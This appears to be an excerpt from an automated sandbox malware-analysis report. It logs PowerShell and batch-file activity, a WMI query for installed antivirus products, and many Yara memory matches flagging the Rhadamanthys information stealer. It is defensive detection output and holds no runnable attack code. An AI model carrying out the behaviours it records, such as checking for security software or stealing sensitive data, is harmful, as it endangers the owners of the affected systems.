Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177594D0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle, 4_2_00007FF7177594D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71774E220 GetSystemTimePreciseAsFileTime, 4_2_00007FF71774E220
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\regsvr32.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 0000000C.00000003.1719875612.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1672317407.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1659269474.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1636322926.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1664518031.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.1611964049.000000001B570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1669570254.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1635992929.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1527920288.000000001B790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1672698778.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1657600437.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1670784258.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1642274997.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1649906387.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1641470345.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1665094576.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1718717890.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1732851639.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1637017086.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1673234389.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1536321873.0000022BF57D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1635336719.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1716617542.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1669024902.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1734062423.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1647188143.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1719239524.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1643307727.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1645446937.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1661819733.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1671905824.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1667796484.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1645979631.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1820192855.0000022BF85FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1640027793.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1720627050.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1643999295.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1641144578.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1663391572.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1639097496.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1685422890.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1677206150.0000022BF85F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1667329576.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1676927286.0000022BF85F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1684103225.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1657379194.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1719572786.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1681955679.0000022BF85FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1733626617.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1662264222.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1633957814.000000001BC61000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1669915466.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1728712322.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1664818861.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1668657426.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1644462147.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1718358632.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1636694743.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1717013447.0000022BF85F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1664199634.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1643580454.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1650284949.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1660904997.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1637756767.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1656922103.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1720226582.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1633368508.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1666919810.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1634857555.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1638233166.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1729281119.0000022BF85F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1672457326.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1643036259.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1670609003.0000022BF85F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1717903072.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1658624595.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1633368508.0000022BF8501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1656035942.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1561583400.000000001BF81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1717469357.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
